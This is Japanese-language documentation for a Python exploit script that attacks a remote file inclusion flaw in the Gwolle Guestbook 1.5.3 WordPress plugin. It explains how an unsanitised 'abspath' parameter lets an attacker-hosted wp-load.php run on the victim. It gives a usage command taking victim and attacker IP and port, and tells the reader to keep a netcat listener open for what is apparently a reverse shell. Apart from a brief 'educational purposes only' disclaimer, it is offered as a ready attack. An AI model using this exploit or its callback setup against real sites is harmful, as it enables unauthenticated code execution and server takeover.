
WordPress プラグイン Gwolle Guestbook 1.5.3 - リモートファイルインクルード
このPythonスクリプトは、Gwolle Guestbook WordPressプラグインの重大なリモートファイルインクルード(RFI)脆弱性を悪用します。この脆弱性により、認証されていない攻撃者がリモートのPHPファイルをインクルードし、脆弱なシステム上で任意のコードを実行できる可能性があります。
HTTP GETパラメータ「abspath」は、PHPのrequire()関数で使用される前に適切にサニタイズされません。リモートの攻撃者は、任意のリモートサーバーから'wp-load.php'という名前のファイルをインクルードし、その内容を脆弱なWebサーバー上で実行できます。そのためには、攻撃者は悪意のある'wp-load.php'ファイルを自身のサーバーのドキュメントルートに配置し、サーバーのURLをリクエストに含める必要があります。
この脆弱性の悪用に成功すると、WordPressインストール全体の侵害につながる可能性があり、Webサーバー全体の侵害にまで発展する恐れもあります。
このスクリプトには3つの引数が必要です:
例:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT注:指定されたポートで攻撃者マシンにnetcatリスナーを開いておく必要があります。
このスクリプトは教育目的のみで提供されています。作者は、このスクリプトの誤用によって生じたいかなる損害についても責任を負いません。